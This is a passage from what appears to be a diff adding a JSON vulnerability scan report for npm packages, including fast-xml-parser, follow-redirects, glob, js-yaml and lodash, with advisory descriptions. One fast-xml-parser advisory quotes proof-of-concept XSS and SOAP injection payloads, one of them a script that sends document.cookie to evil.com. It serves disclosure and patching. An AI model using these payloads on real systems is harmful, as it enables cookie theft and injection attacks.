"https://www.cve.org/CVERecord?id=CVE-2026-33036" + ], + "PublishedDate": "2026-03-20T06:16:11.63Z", + "LastModifiedDate": "2026-03-23T16:28:10.93Z" + }, + { + "VulnerabilityID": "CVE-2026-33349", + "VendorIDs": [ + "GHSA-jp2q-39xq-3w4g" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "4.5.5, 5.5.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33349", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7552bbabb2a8717a1d9f8b92ae05d2c868581efbacfbc5b4c65392c379ef6a60", + "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unbounded entity expansion due to incorrect configuration limit handling", + "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1284" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 5.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-33349", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g", + "https://nvd.nist.gov/vuln/detail/CVE-2026-33349", + "https://www.cve.org/CVERecord?id=CVE-2026-33349" + ], + "PublishedDate": "2026-03-24T20:16:29.407Z", + "LastModifiedDate": "2026-03-26T13:01:52.857Z" + }, + { + "VulnerabilityID": "CVE-2026-41650", + "VendorIDs": [ + "GHSA-gh4j-gqv2-49f6" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.7.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41650", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:8886f8885da1664e9f7b587e5e31171d1e9189677fed68f442fa8bcbb2dc914d", + "Title": "fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters", + "Description": "# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters\n\n## Summary\n\nfast-xml-parser XMLBuilder does not escape the `--\u003e` sequence in comment content or the `]]\u003e` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.\n\nExisting CVEs for fast-xml-parser cover different issues:\n- CVE-2023-26920: Prototype pollution (parser)\n- CVE-2023-34104: ReDoS (parser)\n- CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder\n- CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities\n\nThis finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability.\n\n## Vulnerable Code\n\n**File**: `src/fxb.js`\n\n```javascript\n// Line 442 - Comment building with NO escaping of --\u003e\nbuildTextValNode(val, key, attrStr, level) {\n // ...\n if (key === this.options.commentPropName) {\n return this.indentate(level) + `\u003c!--${val}--\u003e` + this.newLine; // VULNERABLE\n }\n // ...\n if (key === this.options.cdataPropName) {\n return this.indentate(level) + `\u003c![CDATA[${val}]]\u003e` + this.newLine; // VULNERABLE\n }\n}\n```\n\nCompare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`.\n\n## Proof of Concept\n\n### Test 1: Comment Injection (XSS in SVG/HTML context)\n\n```javascript\nimport { XMLBuilder } from 'fast-xml-parser';\n\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst xml = {\n root: {\n \"#comment\": \"--\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!--\",\n data: \"legitimate content\"\n }\n};\n\nconsole.log(builder.build(xml));\n```\n\n**Output**:\n```xml\n\u003croot\u003e\n \u003c!----\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!----\u003e\n \u003cdata\u003elegitimate content\u003c/data\u003e\n\u003c/root\u003e\n```\n\n### Test 2: CDATA Injection (RSS feed)\n\n```javascript\nconst builder = new XMLBuilder({\n cdataPropName: \"#cdata\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst rss = {\n rss: { channel: { item: {\n title: \"Article\",\n description: {\n \"#cdata\": \"Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more\"\n }\n }}}\n};\n\nconsole.log(builder.build(rss));\n```\n\n**Output**:\n```xml\n\u003crss\u003e\n \u003cchannel\u003e\n \u003citem\u003e\n \u003ctitle\u003eArticle\u003c/title\u003e\n \u003cdescription\u003e\n \u003c![CDATA[Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more]]\u003e\n \u003c/description\u003e\n \u003c/item\u003e\n \u003c/channel\u003e\n\u003c/rss\u003e\n```\n\n### Test 3: SOAP Message Injection\n\n```javascript\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true\n});\n\nconst soap = {\n \"soap:Envelope\": {\n \"soap:Body\": {\n \"#comment\": \"Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!--\",\n Action: \"getBalance\",\n UserId: \"12345\"\n }\n }\n};\n\nconsole.log(builder.build(soap));\n```\n\n**Output**:\n```xml\n\u003csoap:Envelope\u003e\n \u003csoap:Body\u003e\n \u003c!--Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!----\u003e\n \u003cAction\u003egetBalance\u003c/Action\u003e\n \u003cUserId\u003e12345\u003c/UserId\u003e\n \u003c/soap:Body\u003e\n\u003c/soap:Envelope\u003e\n```\n\nThe injected `\u003cAction\u003edeleteAll\u003c/Action\u003e` appears as a real SOAP action element.\n\n## Tested Output\n\nAll tests run on Node.js v22, fast-xml-parser v5.5.12:\n\n```\n1. COMMENT INJECTION:\n Injection successful: true\n\n2. CDATA INJECTION (RSS feed scenario):\n Injection successful: true\n\n4. Round-trip test:\n Injection present: true\n\n5. SOAP MESSAGE INJECTION:\n Contains injected Action: true\n```\n\n## Impact\n\nAn attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:\n\n1. **XSS**: Inject `\u003cscript\u003e` tags into XML/SVG/HTML documents served to browsers\n2. **SOAP injection**: Modify SOAP message structure by injecting XML elements\n3. **RSS/Atom feed poisoning**: Inject scripts into RSS feed items via CDATA breakout\n4. **XML document manipulation**: Break XML structure by escaping comment/CDATA context\n\nThis is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).\n\n## Suggested Fix\n\nEscape delimiters in comment and CDATA content:\n\n```javascript\n// For comments: replace -- with escaped equivalent\nif (key === this.options.commentPropName) {\n const safeVal = String(val).replace(/--/g, '\u0026#45;\u0026#45;');\n return this.indentate(level) + `\u003c!--${safeVal}--\u003e` + this.newLine;\n}\n\n// For CDATA: split on ]]\u003e and rejoin with separate CDATA sections\nif (key === this.options.cdataPropName) {\n const safeVal = String(val).replace(/]]\u003e/g, ']]]]\u003e\u003c![CDATA[\u003e');\n return this.indentate(level) + `\u003c![CDATA[${safeVal}]]\u003e` + this.newLine;\n}\n```", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "V3Score": 6.1 + } + }, + "References": [ + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6" + ] + }, + { + "VulnerabilityID": "CVE-2026-27942", + "VendorIDs": [ + "GHSA-fj3w-jwp8-x2g3" + ], + "PkgID": "fast-xml-parser@4.5.3", + "PkgName": "fast-xml-parser", + "PkgIdentifier": { + "PURL": "pkg:npm/fast-xml-parser@4.5.3", + "UID": "590ac80883be18cd" + }, + "InstalledVersion": "4.5.3", + "FixedVersion": "5.3.8, 4.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-27942", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9cf9d8a4e2256f2adaa1c9c51238562d980658f5c646b5259c236470c5d019f5", + "Title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service", + "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. Prior to version 5.3.8, the application crashes with stack overflow when user use XML builder with `preserveOrder:true`. Version 5.3.8 fixes the issue. As a workaround, use XML builder with `preserveOrder:false` or check the input data before passing to builder.", + "Severity": "LOW", + "CweIDs": [ + "CWE-120" + ], + "VendorSeverity": { + "ghsa": 1, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", + "V40Score": 2.7 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-27942", + "https://github.com/NaturalIntelligence/fast-xml-parser", + "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a", + "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791", + "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3", + "https://nvd.nist.gov/vuln/detail/CVE-2026-27942", + "https://www.cve.org/CVERecord?id=CVE-2026-27942" + ], + "PublishedDate": "2026-02-26T02:16:22.357Z", + "LastModifiedDate": "2026-03-02T14:54:48.08Z" + }, + { + "VulnerabilityID": "GHSA-r4q5-vmmm-2653", + "PkgID": "follow-redirects@1.15.11", + "PkgName": "follow-redirects", + "PkgIdentifier": { + "PURL": "pkg:npm/follow-redirects@1.15.11", + "UID": "6524ae70e09c9077" + }, + "InstalledVersion": "1.15.11", + "FixedVersion": "1.16.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-r4q5-vmmm-2653", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:56c430be3e8ce1c3fe82dfd8fab18307f64d7712ffa9624b2aa500d5504f5eed", + "Title": "follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets", + "Description": "## Summary\n\nWhen an HTTP request follows a cross-domain redirect (301/302/307/308), `follow-redirects` only strips `authorization`, `proxy-authorization`, and `cookie` headers (matched by regex at index.js:469-476). Any custom authentication header (e.g., `X-API-Key`, `X-Auth-Token`, `Api-Key`, `Token`) is forwarded verbatim to the redirect target.\n\nSince `follow-redirects` is the redirect-handling dependency for **axios** (105K+ stars), this vulnerability affects the entire axios ecosystem.\n\n## Affected Code\n\n`index.js`, lines 469-476:\n\n```javascript\nif (redirectUrl.protocol !== currentUrlParts.protocol \u0026\u0026\n redirectUrl.protocol !== \"https:\" ||\n redirectUrl.host !== currentHost \u0026\u0026\n !isSubdomain(redirectUrl.host, currentHost)) {\n removeMatchingHeaders(/^(?:(?:proxy-)?authorization|cookie)$/i, this._options.headers);\n}\n```\n\nThe regex only matches `authorization`, `proxy-authorization`, and `cookie`. Custom headers like `X-API-Key` are not matched.\n\n## Attack Scenario\n\n1. App uses axios with custom auth header: `headers: { 'X-API-Key': 'sk-live-secret123' }`\n2. Server returns `302 Location: https://evil.com/steal`\n3. follow-redirects sends `X-API-Key: sk-live-secret123` to `evil.com`\n4. Attacker captures the API key\n\n## Impact\n\nAny custom auth header set via axios leaks on cross-domain redirect. Extremely common pattern. Affects all axios users in Node.js.\n\n## Suggested Fix\n\nAdd a `sensitiveHeaders` option that users can extend, or strip ALL non-standard headers on cross-domain redirect.\n\n## Disclosure\n\nSource code review, manually verified. Found 2026-03-20.", + "Severity": "MEDIUM", + "VendorSeverity": { + "ghsa": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N", + "V40Score": 6.9 + } + }, + "References": [ + "https://github.com/follow-redirects/follow-redirects", + "https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9", + "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653" + ], + "PublishedDate": "2026-04-14T01:11:11Z", + "LastModifiedDate": "2026-04-14T01:11:11Z" + }, + { + "VulnerabilityID": "CVE-2025-64756", + "VendorIDs": [ + "GHSA-5j98-mcp5-4vw2" + ], + "PkgID": "glob@10.4.5", + "PkgName": "glob", + "PkgIdentifier": { + "PURL": "pkg:npm/glob@10.4.5", + "UID": "aa8173cd075f0cb0" + }, + "InstalledVersion": "10.4.5", + "FixedVersion": "11.1.0, 10.5.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:438e4ae35eba3f19a1424dbd14ce8631712291e65f153464a9f3e9af0774b568", + "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", + "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-78" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64756", + "https://github.com/isaacs/node-glob", + "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", + "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", + "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", + "https://www.cve.org/CVERecord?id=CVE-2025-64756" + ], + "PublishedDate": "2025-11-17T18:15:58.27Z", + "LastModifiedDate": "2025-12-02T19:34:43.27Z" + }, + { + "VulnerabilityID": "CVE-2025-64756", + "VendorIDs": [ + "GHSA-5j98-mcp5-4vw2" + ], + "PkgID": "glob@11.0.3", + "PkgName": "glob", + "PkgIdentifier": { + "PURL": "pkg:npm/glob@11.0.3", + "UID": "3a0538ce88725972" + }, + "InstalledVersion": "11.0.3", + "FixedVersion": "11.1.0, 10.5.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64756", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6ec7ae4be5d73f56ab1ffffbd5ab4edf3fc8eae1909cb8c9ce137066ebef93be", + "Title": "glob: glob: Command Injection Vulnerability via Malicious Filenames", + "Description": "Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c \u003ccommand\u003e \u003cpatterns\u003e are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-78" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64756", + "https://github.com/isaacs/node-glob", + "https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f", + "https://github.com/isaacs/node-glob/commit/47473c046b91c67269df7a66eab782a6c2716146", + "https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64756", + "https://www.cve.org/CVERecord?id=CVE-2025-64756" + ], + "PublishedDate": "2025-11-17T18:15:58.27Z", + "LastModifiedDate": "2025-12-02T19:34:43.27Z" + }, + { + "VulnerabilityID": "CVE-2025-64718", + "VendorIDs": [ + "GHSA-mh29-5h37-fv8m" + ], + "PkgID": "js-yaml@3.14.1", + "PkgName": "js-yaml", + "PkgIdentifier": { + "PURL": "pkg:npm/js-yaml@3.14.1", + "UID": "63902cab6028fa26" + }, + "InstalledVersion": "3.14.1", + "FixedVersion": "4.1.1, 3.14.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6207568f406e0e06494d98d6905a43475f4796f0d8bf99beb6ccbf38e21c7610", + "Title": "js-yaml: js-yaml prototype pollution in merge", + "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64718", + "https://github.com/advisories/GHSA-mh29-5h37-fv8m", + "https://github.com/nodeca/js-yaml", + "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", + "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", + "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", + "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", + "https://www.cve.org/CVERecord?id=CVE-2025-64718" + ], + "PublishedDate": "2025-11-13T16:15:57.153Z", + "LastModifiedDate": "2026-02-02T12:54:45.34Z" + }, + { + "VulnerabilityID": "CVE-2025-64718", + "VendorIDs": [ + "GHSA-mh29-5h37-fv8m" + ], + "PkgID": "js-yaml@4.1.0", + "PkgName": "js-yaml", + "PkgIdentifier": { + "PURL": "pkg:npm/js-yaml@4.1.0", + "UID": "7704269816196759" + }, + "InstalledVersion": "4.1.0", + "FixedVersion": "4.1.1, 3.14.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64718", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:7b42f25f2dbbceb11a4e93796126012a47d80de146a4d427a845823aedd081b7", + "Title": "js-yaml: js-yaml prototype pollution in merge", + "Description": "js-yaml is a JavaScript YAML parser and dumper. In js-yaml before 4.1.1 and 3.14.2, it's possible for an attacker to modify the prototype of the result of a parsed yaml document via prototype pollution (`__proto__`). All users who parse untrusted yaml documents may be impacted. The problem is patched in js-yaml 4.1.1 and 3.14.2. Users can protect against this kind of attack on the server by using `node --disable-proto=delete` or `deno` (in Deno, pollution protection is on by default).", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64718", + "https://github.com/advisories/GHSA-mh29-5h37-fv8m", + "https://github.com/nodeca/js-yaml", + "https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879", + "https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266", + "https://github.com/nodeca/js-yaml/issues/730#issuecomment-3549635876", + "https://github.com/nodeca/js-yaml/security/advisories/GHSA-mh29-5h37-fv8m", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64718", + "https://www.cve.org/CVERecord?id=CVE-2025-64718" + ], + "PublishedDate": "2025-11-13T16:15:57.153Z", + "LastModifiedDate": "2026-02-02T12:54:45.34Z" + }, + { + "VulnerabilityID": "CVE-2026-4800", + "VendorIDs": [ + "GHSA-r5fr-rjxr-66jc" + ], + "PkgID": "lodash@4.17.21", + "PkgName": "lodash", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "186d85640a76e982" + }, + "InstalledVersion": "4.17.21", + "FixedVersion": "4.18.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4800", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:bfa4e6086061915add10b46668d382bb7bac351407b54c2f683980dddef29bdc", + "Title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports", + "Description": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-94" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 4, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 9.8 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 8.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-4800", + "https://cna.openjsf.org/security-advisories.html", + "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", + "https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc", + "https://nvd.nist.gov/vuln/detail/CVE-2026-4800", + "https://www.cve.org/CVERecord?id=CVE-2026-4800" + ], + "PublishedDate": "2026-03-31T20:16:29.66Z", + "LastModifiedDate": "2026-04-07T15:43:13.197Z" + }, + { + "VulnerabilityID": "CVE-2025-13465", + "VendorIDs": [ + "GHSA-xxjr-mmjv-4gpg" + ], + "PkgID": "lodash@4.17.21", + "PkgName": "lodash", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@4.17.21", + "UID": "186d85640a76e982" + }, + "InstalledVersion": "4.17.21", + "FixedVersion": "4.17.23", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13465", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:cc25af6e4cbe197ebe6d0b3807bbd793f2a7d79c4805cf42fb22824d9912d1a3", + "Title": "lodash: prototype pollution in _.unset and _.omit functions", + "Description": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 2, + "nvd": 2, + "oracle-oval": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:H/SI:H/SA:H/E:P", + "V3Score": 6.5, + "V40Score": 6.9 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:2452", + "https://access.redhat.com/security/cve/CVE-2025-13465", + "https://bugzilla.redhat.com/2431740", + "https://errata.almalinux.org/9/ALSA-2026-2452.html", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81", + "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", + "https://linux.oracle.com/cve/CVE-2025-13465.html", + "https://linux.oracle.com/errata/ELSA-2026-2452.html", + "https://nvd.nist.gov/vuln/detail/CVE-2025-13465", + "https://www.cve.org/CVERecord?id=CVE-2025-13465" + ], + "PublishedDate": "2026-01-21T20:16:05.25Z", + "LastModifiedDate": "2026-02-17T17:10:07.52Z" + }, + { + "VulnerabilityID": "CVE-2026-2950", + "VendorIDs": [ + "GHSA-f23m-r3pf-42rh" + ], + "PkgID": "lodash@4.17.21", + "PkgName": "lodash", + 